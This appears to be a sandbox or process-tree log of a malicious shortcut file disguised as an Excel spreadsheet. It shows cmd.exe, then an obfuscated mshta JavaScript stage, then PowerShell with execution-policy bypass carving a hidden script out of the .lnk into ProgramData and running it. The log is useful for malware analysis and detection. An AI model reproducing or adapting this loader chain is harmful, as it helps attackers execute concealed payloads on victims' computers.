cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "MULbcsTupkzLQbl" C:\Users\test22\AppData\Local\Temp\20250410_70404.xls.lnk
3048
mshta.exe "C:\Windows\System32\mshta.exe" javascript:g="c:\\prog"+"ramdata\\";m=" -Encod"+"ing Byte;sc ";a="rshell -ep bypa"+"ss ";p="$w ([byte[]]($f | select -Skip 0x0976)) -Force";s="a=new Activ"+"eXObject('WScr"+"ipt.Shell');a.Run(c,0,true);close();";c="powe"+a+"-c $t=0x19c6;$k = Get-ChildItem *.lnk | where-object {$_.length -eq $t} | Select-Object -Expan"+"dProperty Name;if($k.c"+"ount -eq 0){$k=Get-ChildItem $env:TEMP\\*\\*.lnk | where-object{$_.length -eq $t};};$w='"+g+"h.ps1';$f=gc $k"+m+p+m+g+"41026 0;"+"powe"+a+"-f $w;";eval(s);
2200
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -c $t=0x19c6;$k = Get-ChildItem *.lnk | where-object {$_.length -eq $t} | Select-Object -ExpandProperty Name;if($k.count -eq 0){$k=Get-ChildItem $env:TEMP\*\*.lnk | where-object{$_.length -eq $t};};$w='c:\programdata\h.ps1';$f=gc $k -Encoding Byte;sc $w ([byte[]]($f | select -Skip 0x0976)) -Force -Encoding Byte;sc c:\programdata\41026 0;powershell -ep bypass -f $w;
2356
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -f c:\programdata\h.ps1
1608